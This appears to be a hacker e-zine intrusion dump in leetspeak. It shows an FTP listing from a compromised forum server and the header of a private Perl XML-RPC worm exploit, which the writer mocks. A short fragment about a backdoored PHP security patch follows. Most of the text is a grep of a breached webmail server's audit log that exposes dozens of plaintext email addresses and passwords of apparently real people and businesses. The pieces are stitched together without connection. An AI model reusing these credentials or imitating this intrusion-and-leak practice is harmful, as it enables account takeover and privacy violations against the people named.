-rw-rw-r-- 1 1585250 1000000 38640 Dec 9 04:09 modcp.php
-rw-rw-r-- 1 1585250 1000000 3109 Dec 17 01:50 modcp_body.tpl
-rw-rw-r-- 1 1585250 1000000 1724 Dec 17 01:50 modcp_move.tpl
-rw-rw-r-- 1 1585250 1000000 3788 Dec 17 01:51 modcp_split.tpl
-rw-rw-r-- 1 1585250 1000000 2196 Dec 17 01:50 modcp_viewip.tpl
-rw-rw-r-- 1 1585250 1000000 47 Feb 17 19:19 modp.php
-rw-rw-r-- 1 1585250 1000000 1211 Dec 17 01:50 overall_footer.tpl
-rw-rw-r-- 1 1585250 1000000 3823 Dec 17 06:34 overall_header.tpl
-rw-rw-r-- 1 1585250 1000000 34903 Dec 9 04:09 posting.php
-rw-rw-r-- 1 1585250 1000000 20300 Dec 17 01:51 posting_body.tpl
-rw-rw-r-- 1 1585250 1000000 2102 Dec 17 01:50 posting_poll_body.tpl
-rw-rw-r-- 1 1585250 1000000 1158 Dec 17 01:50 posting_preview.tpl
-rw-rw-r-- 1 1585250 1000000 2306 Dec 17 01:50 posting_smilies.tpl
-rw-rw-r-- 1 1585250 1000000 2565 Dec 17 01:50 posting_topic_review.tpl
-rw-rw-r-- 1 1585250 1000000 73687 Dec 9 04:09 privmsg.php
-rw-rw-r-- 1 1585250 1000000 5338 Dec 17 01:51 privmsgs_body.tpl
-rw-rw-r-- 1 1585250 1000000 1138 Dec 17 01:50 privmsgs_popup.tpl
-rw-rw-r-- 1 1585250 1000000 1166 Dec 17 01:50 privmsgs_preview.tpl
-rw-rw-r-- 1 1585250 1000000 3747 Dec 17 01:51 privmsgs_read_body.tpl
-rw-rw-r-- 1 1585250 1000000 3947 Dec 9 04:09 profile.php
-rw-rw-r-- 1 1585250 1000000 14661 Dec 17 01:51 profile_add_body.tpl
-rw-rw-r-- 1 1585250 1000000 2007 Dec 17 01:50 profile_avatar_gallery.tpl
-rw-rw-r-- 1 1585250 1000000 3025 Dec 17 01:50 profile_send_email.tpl
-rw-rw-r-- 1 1585250 1000000 1737 Dec 17 01:50 profile_send_pass.tpl
-rw-rw-r-- 1 1585250 1000000 3927 Dec 17 01:51 profile_view_body.tpl
-rw-rw-r-- 1 1585250 1000000 226 Dec 17 01:50 scripts.js
-rw-rw-r-- 1 1585250 1000000 43342 Dec 9 04:09 search.php
-rw-rw-r-- 1 1585250 1000000 5133 Dec 17 01:51 search_body.tpl
-rw-rw-r-- 1 1585250 1000000 2983 Dec 17 01:50 search_results_posts.tpl
-rw-rw-r-- 1 1585250 1000000 2883 Dec 17 01:50 search_results_topics.tpl
-rw-rw-r-- 1 1585250 1000000 1873 Dec 17 01:50 search_username.tpl
-rw-rw-r-- 1 1585250 1000000 325 Dec 17 01:50 simple_footer.tpl
-rw-rw-r-- 1 1585250 1000000 916 Dec 17 01:50 simple_header.tpl
drwxrwxr-x 5 1585250 1000000 4096 Dec 17 06:28 templates
-rw-rw-r-- 1 1585250 1000000 4388 Dec 17 01:51 theme_info.cfg
-rw-rw-r-- 1 1585250 1000000 23154 Dec 9 04:09 viewforum.php
-rw-rw-r-- 1 1585250 1000000 5717 Dec 17 01:51 viewforum_body.tpl
-rw-rw-r-- 1 1585250 1000000 7233 Dec 9 04:09 viewonline.php
-rw-rw-r-- 1 1585250 1000000 2915 Dec 17 01:50 viewonline_body.tpl
-rw-rw-r-- 1 1585250 1000000 45235 Dec 9 04:09 viewtopic.php
-rw-rw-r-- 1 1585250 1000000 5281 Dec 17 01:51 viewtopic_body.tpl
-rw-rw-r-- 1 1585250 1000000 1092 Dec 17 01:50 viewtopic_poll_ballot.tpl
-rw-rw-r-- 1 1585250 1000000 1384 Dec 17 01:50 viewtopic_poll_result.tpl
-rw-rw-r-- 1 1585250 1000000 340 Dec 17 01:50 xs.cfg
226 Transfer complete.
ftp> exit
th3r3 w4sn7 m4ny w4r3z bU7 w3 t4k3 th3m 4nyw4y...
# cat CoreStorm-RPC-worm-PRIV.pl.pl
#!/usr/bin/perl -w
#*********************************************
#XML-RPC Remote Command Exploit - Worm
#You want a b0t n3t well here's the tool
#Have fun kids and remember dd0sing is k-spiff
#www.corestorm.com AN0THER C0REST0RM PRODUCT1ON
#*********************************************
#PRIV PRIV PRIV PRIV PRIV PRIV PRIV PRIV
#PRIV PRIV PRIV PRIV PRIV PRIV PRIV PRIV
#\\StOrM\\- NWO
#*********************************************
wh4t th3 fuCk th1z 1z n0t th3 SSH 0hd4yz 1 w4nt3d...
#!/usr/bin/perl -w
# xml-rpc remote command exploit
# [ auto-owner ]
#
# ##
# by : rx @corestorm.com
# storm @corestorm.com
# anthis @corestorm.com
# url : http://www.corestorm.com
# priv8 : yes
# ##
... 3xpl01tz f0r publ1c fuck1ng w3b vulnz 1z all yu0 h4ve?
3y3 l1k3 th3 w0rm t3chn1qu3 [(c) bysin]. d0 n0t 3v3n m3nt10n
yu0r sh1tty gr0upz n4m3 1n th3 s4me s3nt4nc3 4z 7350 0r w00w00...
furth3rm0r3, wh4tz th3 fuqn p01nt 0f putt1ng 4ll y0ur d0rky
m3mb3rz n4m3z and url 1n th3 h34d3r 1ph 1t'z pr1v4t3?
4nsw3r: s0 wh3n y0u g3t 0wn3d by h0no y0u'll b4 f4m0uz l1k3 t4l0n.
25.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 2 (kunz)
t1tl3:
h0no 4dv1s0ry 0n h4rd3n3d-php p4tch.
ab0ut th3 h0no 0d4y b4qd00r:
w3 f0und th1z b4qd00r 0n th3 w3b. 1t w4z 4cc1d3ntly m1zl4b3l3d 4z a
s3cur1ty t00l.
h0w 1t w0rkz:
a stup1d 4dm1n 1nst4llz b4qd00r th1nk1ng h3 1z s3cur1ng h1z syst3m fr0m
h4q3rz. 1nst34d th3 h4q3rs uz3 th3 b4qd00r t0 3v3v4t3 pr1vl3dg3z.
p0c:
(plz n0te, kunz b0x w4z vuln t0 l1k3 3v3ry w3b4pp vuln 1n th3 l4zt 6 y34rz.
php-security.org... right)
webby:/var/log/httpd# grep 'pass=' audit.log
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=PJT@lmtc-ger.de&pass=lmtcxyz56&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=vf@vollfro.de&pass=kleikatiss&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=vf@vollfro.de&pass=kleikatiss&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=vf@vollfro.de&pass=kleikatiss&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=PJT@lmtc-ger.de&pass=lmtcxyz56&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=kai%40echoes-online.de&pass=H4d3s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=kai%40echoes-online.de&pass=H4d3s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=harald.wenzel@filoo.de&pass=r12004&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=matthias@vohs.de&pass=porky62&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=fundjquaak@verein-mediacom.de&pass=vegetarisch&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=torsten.hainke@societaet-phg.de&pass=PhG1234&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=julian%40echoes-online.de&pass=stuh2s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=bruno@weberei-rockt.de&pass=84765&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=office@msmautern.com&pass=mozart&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=office@msmautern.com&pass=mozart&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@societaet-phg.de&pass=PhG1234&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=nachtfalke@radio-justforyou.com&pass=unseradmin&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info@kingparts.de&pass=nino&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=vf@vollfro.de&pass=kleikatiss&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
Horde=1b3ca6d83d2d7b4600e1de577923f8d4&actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php%3FHorde%3D1b3ca6d83d2d7b4600e1de577923f8d4&mailbox=INBOX&imapuser=kadiya%40schattenlan.de&pass=zat22kad&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=felde@pc-factory.de&pass=oxygen12&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Info@queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=sebastian.grewing%40filoo.de&pass=kruemel97&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=benjamin%25birkenhake.org&pass=hamlet&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=hanibal@lmtc-ger.de&pass=lmtc55han&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=Sebo%40moshpit.de&pass=23Stirb&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=michaela.niebur@rfv-harsewinkel.de&pass=michaela&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=michaela.niebur@rfv-harsewinkel.de&pass=michaela&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=benjamin%25birkenhake.org&pass=hamlet&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=benjamin%25birkenhake.org&pass=hamlet&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=PJT@lmtc-ger.de&pass=lmtcxyz56&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=info%40queerbeet-lg.de&pass=homoehe&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=andre@i-baum.de&pass=techido&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=andre@i-baum.de&pass=techido&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=andre.baumgartl@i-baum.de&pass=techido&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=de_DE&button=Anmelden
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=kai%40echoes-online.de&pass=H4d3s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=kai%40echoes-online.de&pass=H4d3s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
actionID=105&url=http%3A%2F%2Fwebmail.de-punkt.de%2Fhorde%2Flogin.php&mailbox=INBOX&imapuser=kai%40echoes-online.de&pass=H4d3s&server=mail.de-punkt.de&port=143&namespace=INBOX.&maildomain=&protocol=imap%2Fnotls&realm=&folders=&new_lang=en_US&button=Log+in
